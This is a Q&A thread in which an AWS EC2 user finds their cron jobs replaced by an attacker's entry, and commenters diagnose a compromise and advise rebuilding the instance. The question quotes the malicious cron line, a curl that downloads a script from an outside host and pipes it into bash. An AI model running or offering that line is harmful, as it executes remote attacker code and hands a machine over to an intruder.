# AWS EC2 crontab keeps getting hacked or changed

Tags: amazon-web-services, amazon-ec2, cron

I have a EC2 instance and using `sudo crontab -u apache -e` to add crons to my instance to run as apache user.

I have noticed that once a week or so the cron entries get wiped out and instead get replaced by one that is doing a curl:

```
curl -sk "http://static.megalodon.host/sync?time=1655833656" | bash > /dev/null 2>&1
```

I have deleted all access keys deleted all users and have only created an access key that has access to a S3 bucket. I even went ahead and modified security groups to allow ssh access only from specific IP address to my instance.

How is this possible and what other steps do I need to take to ensure this doesn't happen? Am I being hacked?

Comment: It may be too late if there is something else already on the machine.  I'd consider creating a new machine and be careful what you copy from the old one.  But this is really not a programming question and https://superuser.com would be a better place.

Comment: Thanks for the reply i went ahead and asked there - im trying to avoid having to create a new machine if possible. I noticed today that the ssh access restriction in the security group was open to all IP's so i just modified it earlier to only restrict it to my IP

Comment: But if you take a look at that script it's installing something - "the client" and getting more stuff from that host including "/join".  It's listening on port 6667 so you can attempt to do something like an `lsof` to dig there but I'd be concerned that there is already something installed, regardless of your current security config.  If you look at the crontab it looks like there is a commented out line to get something from a server in Latvia.

Comment: if i was to create a new instance can i make a image of my existing image and use that so i dont have to install everything or would i need to start from scratch?

Comment: If you create an AMI from what you have you run the risk of copying over the issue.  Ideally you will have or could create something like a [user data script](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-add-user-data.html) to spin up this and future instances.  Only with a clean start are you 100% sure.

Comment: "*im trying to avoid having to create a new machine if possible*" This is the wrong stance for a machine that might no longer be under your control.  Stop it.  Now.  Before it does more damage.  Any other answer is needlessly risky.

Comment: Thanks everyone for the responses. I went ahead and created a new instance from scratch and terminated the old instance.